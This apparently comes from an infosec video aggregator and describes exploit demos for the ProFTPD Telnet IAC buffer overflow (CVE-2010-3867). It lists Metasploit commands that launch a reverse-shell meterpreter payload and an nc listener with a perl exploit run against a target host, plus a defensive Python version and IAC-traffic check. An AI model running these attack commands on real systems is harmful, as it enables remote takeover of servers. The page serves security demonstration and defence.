Description: Metasploit and Exploit-DB exploit demonstrations
Timeline:
Vulnerability reported to vendor by ZDI on 2010-09-24
Coordinated public release of advisory on 2010-11-02
Metasploit exploit released on 2010-11-05
Exploit-DB exploit released on 2010-11-07
PoC provided by:
jduck for Metasploit exploit
Kingcope for Exploit-DB exploit
References:
CVE-2010-3867
EDB-15449
Affected versions:
ProFTPD versions between 1.3.2rc3 and 1.3.3b
Tested on Debian Squeeze with:
ProFTPD proftpd-basic_1.3.3a-4_i386.deb
Description:
This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.
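A defender-side triage sketch for the flaw described above, added here as an example and not taken from the video, Metasploit or the Exploit-DB PoC: it checks a ProFTPD greeting banner against the affected range given on this page and flags FTP control-channel lines carrying an unusually large number of Telnet IAC (0xFF) bytes. The inclusive range bounds, the threshold of 16, the function names, and the sample banner and byte stream are assumptions constructed for illustration.

```python
import re

# Affected range as stated on this page, treated as inclusive (assumption).
FIRST_AFFECTED, LAST_AFFECTED = "1.3.2rc3", "1.3.3b"
IAC = b"\xff"         # Telnet "Interpret As Command" byte
IAC_THRESHOLD = 16    # assumed tuning value, not from the page

_VER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:rc(\d+)|([a-z]))?$")

def version_key(version):
    """Sort key for ProFTPD versions: 1.3.3rc1 < 1.3.3 < 1.3.3a < 1.3.3b."""
    m = _VER.match(version.strip())
    if not m:
        raise ValueError("unrecognised ProFTPD version: %r" % version)
    major, minor, patch, rc, letter = m.groups()
    if rc:                       # release candidates precede the release
        stage = (0, int(rc))
    elif letter:                 # letter suffixes are maintenance releases
        stage = (2, ord(letter) - ord("a") + 1)
    else:
        stage = (1, 0)
    return (int(major), int(minor), int(patch)) + stage

def is_affected(version):
    return version_key(FIRST_AFFECTED) <= version_key(version) <= version_key(LAST_AFFECTED)

def banner_version(banner):
    """Extract the version from a '220 ProFTPD x.y.z Server ...' greeting, or None."""
    m = re.search(r"ProFTPD (\d+\.\d+\.\d+(?:rc\d+|[a-z])?)\b", banner)
    return m.group(1) if m else None

def iac_heavy_commands(control_bytes, threshold=IAC_THRESHOLD):
    """Return (line_index, iac_count) for FTP command lines with many IAC bytes."""
    hits = []
    for i, line in enumerate(control_bytes.split(b"\r\n")):
        count = line.count(IAC)
        if count >= threshold:   # a normal ABOR carries only two IAC bytes
            hits.append((i, count))
    return hits

# Constructed sample inputs (not captured traffic).
SAMPLE_BANNER = "220 ProFTPD 1.3.3a Server (Debian) [192.168.178.40]"
SAMPLE_STREAM = b"USER anonymous\r\n" + b"A" * 8 + IAC * 40 + b"\r\n\xff\xf4\xff\xf2ABOR\r\n"

if __name__ == "__main__":
    v = banner_version(SAMPLE_BANNER)
    print(v, "affected" if is_affected(v) else "not affected")
    print(iac_heavy_commands(SAMPLE_STREAM))
```

Distribution packages can carry a backported fix under an unchanged upstream version, so treat a banner match as a prompt to check the package changelog rather than as proof of exposure.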
Metasploit demo:
use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
ipconfig
Exploit-DB demo:
nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig
Tags: metasploit, exploit, ftp, root, remote, hack
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.